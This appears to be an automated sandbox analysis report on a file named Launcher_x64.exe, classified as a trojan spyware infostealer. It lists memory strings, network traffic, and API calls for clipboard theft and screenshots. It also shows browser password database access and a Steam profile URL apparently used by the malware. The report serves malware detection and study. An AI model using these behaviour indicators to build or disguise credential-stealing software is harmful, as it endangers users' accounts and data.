                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2602917926.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2556263712.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2530449435.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900.
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: Launcher_x64.exe, 00000003.00000003.2458317534.0000000003651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Launcher_x64.exe, 00000003.00000003.2458400920.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2480922810.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458317534.000000000364F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Launcher_x64.exe, 00000003.00000003.2458400920.0000000003623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Launcher_x64.exe, 00000003.00000003.2458400920.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2480922810.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458317534.000000000364F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Launcher_x64.exe, 00000003.00000003.2458400920.0000000003623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49784 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49790 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49795 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49801 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49807 version: TLS 1.2
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00432580 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00432580
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00432580 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00432580
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00432740 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00432740
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D1C0400_2_00D1C040
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D010000_2_00D01000
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D161940_2_00D16194
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D212500_2_00D21250
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D2EB720_2_00D2EB72
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D1AC410_2_00D1AC41
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D2CD970_2_00D2CD97
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D1C0402_2_00D1C040
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D010002_2_00D01000
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D161942_2_00D16194
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D212502_2_00D21250
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D2EB722_2_00D2EB72
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D1AC412_2_00D1AC41
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D2CD972_2_00D2CD97
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043A8D03_2_0043A8D0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043E9503_2_0043E950
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042C9113_2_0042C911
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00426A703_2_00426A70
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004232203_2_00423220
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00437A303_2_00437A30
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004162C43_2_004162C4
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0040AB703_2_0040AB70
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0040DCB93_2_0040DCB9
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0040CDE73_2_0040CDE7
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043EDA03_2_0043EDA0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004377203_2_00437720
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043F7803_2_0043F780
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042D78A3_2_0042D78A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042B8013_2_0042B801
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041D0F03_2_0041D0F0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004368883_2_00436888
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043F0903_2_0043F090
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004289503_2_00428950
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004239603_2_00423960
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004251703_2_00425170
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042E1063_2_0042E106
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004039103_2_00403910
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004059103_2_00405910
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004199303_2_00419930
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004191323_2_00419132
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042E1EA3_2_0042E1EA
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043B1F03_2_0043B1F0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042799C3_2_0042799C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004281AC3_2_004281AC
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004371B03_2_004371B0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042E2463_2_0042E246
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041524C3_2_0041524C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004172703_2_00417270
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004062003_2_00406200
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004262003_2_00426200
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004252103_2_00425210
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004092203_2_00409220
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042A22E3_2_0042A22E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042E2343_2_0042E234
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004042C03_2_004042C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043DAD23_2_0043DAD2
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041FAD23_2_0041FAD2
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043EAF03_2_0043EAF0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041CA9B3_2_0041CA9B
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004323503_2_00432350
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00408B103_2_00408B10
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00418B2E3_2_00418B2E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043DB303_2_0043DB30
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00435BC63_2_00435BC6
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041D3E03_2_0041D3E0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004383F03_2_004383F0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00421B803_2_00421B80
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00424B803_2_00424B80
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004191323_2_00419132
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004074703_2_00407470
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00438C703_2_00438C70
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043DC703_2_0043DC70
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00410C793_2_00410C79
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043F4103_2_0043F410
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041AC203_2_0041AC20
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00427C863_2_00427C86
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042C4A03_2_0042C4A0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00428D403_2_00428D40
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004285553_2_00428555
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042C5103_2_0042C510
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041DD203_2_0041DD20
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043ADC03_2_0043ADC0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004145E13_2_004145E1
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00413DE03_2_00413DE0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004205E03_2_004205E0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004225EF3_2_004225EF
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043558A3_2_0043558A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041F5923_2_0041F592
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043DDA03_2_0043DDA0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042E5B93_2_0042E5B9
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041C6403_2_0041C640
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042965D3_2_0042965D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00418E733_2_00418E73
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00438E073_2_00438E07
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004162C43_2_004162C4
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0040A6C03_2_0040A6C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00426EE03_2_00426EE0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00402EF03_2_00402EF0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004306F03_2_004306F0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004386803_2_00438680
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004066903_2_00406690
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00436F503_2_00436F50
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00426F003_2_00426F00
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0042AF103_2_0042AF10
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041BF203_2_0041BF20
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00421F203_2_00421F20
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00423F283_2_00423F28
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00445F393_2_00445F39
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_004117C03_2_004117C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0041D7E03_2_0041D7E0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00413DD0 appears 66 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00D166A0 appears 100 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00D241C4 appears 34 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00D1F55E appears 42 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00407EC0 appears 55 times
                Source: Launcher_x64.exe, 00000000.00000000.1721196116.0000000000D91000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exe, 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exe, 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exe, 00000003.00000000.1729614724.0000000000D91000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exe, 00000003.00000003.1729885980.0000000002894000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exeBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Launcher_x64.exeStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/1@11/3
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00437A30 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00437A30
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
                Source: Launcher_x64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Launcher_x64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Launcher_x64.exe, 00000003.00000003.2457904734.0000000003627000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458531560.00000000035F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Launcher_x64.exeReversingLabs: Detection: 28%
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile read: C:\Users\user\Desktop\Launcher_x64.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
